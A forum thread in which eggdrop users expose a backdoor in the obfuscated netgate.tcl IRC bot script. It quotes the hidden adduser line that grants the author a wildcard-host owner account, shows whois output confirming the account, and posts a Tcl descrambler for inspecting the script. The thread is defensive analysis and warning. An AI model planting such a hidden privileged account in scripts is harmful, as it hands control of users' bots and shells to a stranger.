netgate backdoor

[Alchera]

$ps : Any one or people in dalnet always look this a backdoor, why?

Maybe a little variable filling:

Code: Select all

adduser $ps "$ps!*@*"

Translates to:

Code: Select all

adduser KaISaR "KaISaR!*@*"

Maybe I'm just the suspicious type NeTGate, but I have the distinct impression your defence of this "feature" rich script is due to the fact you know its' author very well (both coming from the same part of the world) and were not expecting the scrutiny that our resident guru (user) gave it.

It's as plain as the nose on your little face that this script is designed to hijack eggdrops and I will make an effort to have this piece of information disseminated throughout DALnet.

[metroid]

This little backdoor is also found in the new netgate.tcl, which clearly shows that mister NeTGaTE aka odon has also scripted this in there.

I loaded it up and here's what i found after a rehash

Code: Select all

[08:02:36] <metroid> .whois odon
[08:02:36] <Q14> [08:02] tcl: builtin dcc call: *dcc:whois MeTroiD 8 odon
[08:02:36] <Q14> [08:02] #MeTroiD# whois odon
[08:02:36] <Q14> HANDLE                           PASS NOTES FLAGS           LAST
[08:02:36] <Q14> odon                             no       0 fhjlmnoptxZ     never (nowhere)
[08:02:36] <Q14>   HOSTS: odon!*@*

So please, get lost with your lame little code

[Alchera]

... seems this little bugger thinks all but he is an idiot. Well, he got that wrong. The word is out on DALnet.

[oPLeT]

hi, i try use ur script to descramble netgate.tcl, but it didn't work, it said on my eggdrop:
wrong # args: should be "string first string1 string2"
while executing
"string first $cmdstart $line $i"
(procedure "clearify" line 16)
invoked from within
"clearify code {[decrypt 64 "}"

I put your script on source of my eggdrop, ty anyway.

[demond]

you are using an outdated TCL version (probably 8.0); upgrade it

don't use that script (netgate.tcl, not user's descrambler), it has a backdoor and you may find yourself with a cracked bot/shell account (I warned you about that on the other forum as well)

[aCehNeSe]

This code will convert the script, so you need to have the original obfuscated version...

Code: Select all

# Make http://www.rootshell.be/~netgate/netgate.tcl a bit easier to 
# read (I didn't verify that it runs fine after the conversion, but
# who would want to run that sucky script anyway, right? :P)
#
# Usage: change the variables below before you source this script in
# your eggdrop. eggdrop is needed because parts of the descrambling is
# done using eggdrop's 'decrypt' command

set infile scripts/netgate.tcl
set outfile scripts/netgate.fixed.tcl

# The main (de)scrambler proc
# Escaping is honored for ['s but not the ], $ and space
# - Don't ask me why... I just reproduce the output of the original
proc lines str {
	# The part swapping L with 0 and 0 with L reminds me of my
	# first reaction when i saw the netgate.tcl code :P
	set map {
		a z z a b y y b c x x c d w w d e v v e f u u f g t
		t g h s s h i r r i j q q j k p p k l o o l m n n m
		A Z Z A B Y Y B C X X C D W W D E V V E F U U F G T
		T G H S S H I R R I J Q Q J K P P K L O O L M N N M
	}
	if {[regexp {[\$\[~]+} $str]} {
		set out ""
		set s ""
		set p "";# previous char
		foreach c [split $str ""] {
			if {$s==""} {
				if {$c=="~"} {
					set s ~
				} elseif {$c=="\$"} {
					set s " "; set c ~$c
				} elseif {$c=="\[" && $p!="\"} {
					set s "\]"; set c ~$c
				} else {
					set c [string map $map $c]
				}
			} elseif {$c=="~"} {
				set s ""
			} elseif {$c==$s} {
				set s ""; append c ~
			}
			append out [set p $c]
		}
		if {$s==""} {set out} {append out ~}
	} {
		string map $map $str
	}
}
proc puthlp str {
	set str "puthelp "[string map {~ ""} [lines $str]]""
}
proc putsrv str {
	set str "putserv "[string map {~ ""} [lines $str]]""
}
proc putqck str {
	set str "putquick "[string map {~ ""} [lines $str]]""
}
proc dcp str {
	set str "[qesc [decrypt 64 $str]]"
}
proc dezip str {
	if {[string match {*\\*} $str]} {set str [subst -noc -nov $str]}
	set str [qesc [decrypt 64 [string map {~ ""} $str]]]
}
proc qesc str {
	set out ""
	foreach c [split [string map {
		\\ \\\\ \[ \\\[ \] \\\] \{ \\\{
		\} \\\} \$ \\\$ " \\" " " "\\ "
	} $str] ""] {
		if {[set i [scan $c %c]]>31 && $i<127} {
			append out $c
		} {
			append out [format \\%.3o $i]
		}
	}
	set out
}
proc clearify {var cmdstart {stderr stdout}} {
	upvar 1 $var code
	set off [string len $cmdstart]
	set cmd [lindex [split $cmdstart " "] 0]
	set off2 [string match {\[*} $cmdstart]
	if {$off2} {
		set cmd [string range $cmd 1 end]
	}
	incr off2
	#puts $stderr "*** running "$cmd""
	set c 0
	foreach line [split [set code][set code ""] \n] {
		incr c
		set i 0
		set ll [string len $line]
		while {$i<$ll && [set i [string first $cmdstart $line $i]]>-1} {
			set j [expr {$i+$off+1}]
			while {$j<$ll && ![info complete [set run [string range $line $i $j]]]} {incr j}
			if {[info complete $run]} {
				# lame hack because this was the only command with more arguments :P
				if {$cmdstart=={[decrypt 64 "}} {
					set res [decrypt 64 [string range $run $off end-$off2]]
				} {
					set res [$cmd [string range $run $off end-$off2]]
				}
				set line [string replace $line $i $j $res]
			} {
				#puts $stderr "line#$c INCOMPLETE: "$run""
				break
			}
			incr i
		}
		append code "$line\n"
	}
	#puts $stderr "*** done: "$cmd""
}
proc indent {code {dent {	}}} {
	set out ""
	set i 0
	foreach line [split $code \n] {
		set line [string trimleft $line]
		foreach {o c e} {0 0 0} break
		foreach a [split $line ""] {
			if {$e} {set e 0; continue}
			switch -exact -- $a {
				"\" {set e 1}
				"\{" {incr o}
				"\}" {if {$o} {incr o -1} {incr c}}
			}
		}
		incr i -$c
		append out [string repeat $dent $i]$line\n
		incr i $o
	}
	set out
}

set code [read [set f [open $infile]]]; close $f

clearify code {[decrypt 64 "}
clearify code {[lines "}
clearify code {[dcp "}
clearify code {[dezip "}
clearify code {puthlp "}
clearify code {putsrv "}
clearify code {putqck "}

set f [open $outfile w]
puts $f [indent [set code]][unset code]
close $f
putlog "Check $outfile :)"

# It's a bit of a mess, but it does the job. Have fun :P

Can someone tell me how to use this script?

Thanks

[demond]

like any other script?

[aCehNeSe]

like any other script?

You mean this's a tcl script?
I mean where i can put this scripts? and what's the command to run it?
I'm newbie for it

[demond]

does it look otherwise to you?

[aCehNeSe]

I realy dont understand where i can put this script, and what's the command to run it.
I'm newbie with this

[demond]

then you need to explore this website

it does pretty good job in explaining how to use eggdrop and eggdrop scripts